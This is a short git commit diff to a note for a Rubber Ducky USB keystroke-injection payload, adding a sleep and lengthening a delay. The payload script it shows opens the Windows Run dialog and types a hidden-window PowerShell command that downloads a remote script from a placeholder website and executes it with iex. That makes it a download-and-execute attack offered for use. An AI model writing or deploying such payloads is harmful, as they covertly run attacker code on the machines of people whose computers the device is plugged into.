Added Sleep

This commit is contained in:
Keld Norman 2016-07-25 15:48:35 +02:00
parent ca2307763f
commit 848e5c1e56
1 changed files with 2 additions and 1 deletions

View File

@ -8,10 +8,11 @@ Regards Keld Norman@DK
Write this code to your Rubber Ducky payload file using the encoder, the wget is an alias that exist in powershell already:
---------------------------------------------------------------------
SLEEP 600
GUI r
DELAY 50
DELAY 150
STRING powershell -windowstyle hidden iex (wget http://your-website.com/powershellscript.ps)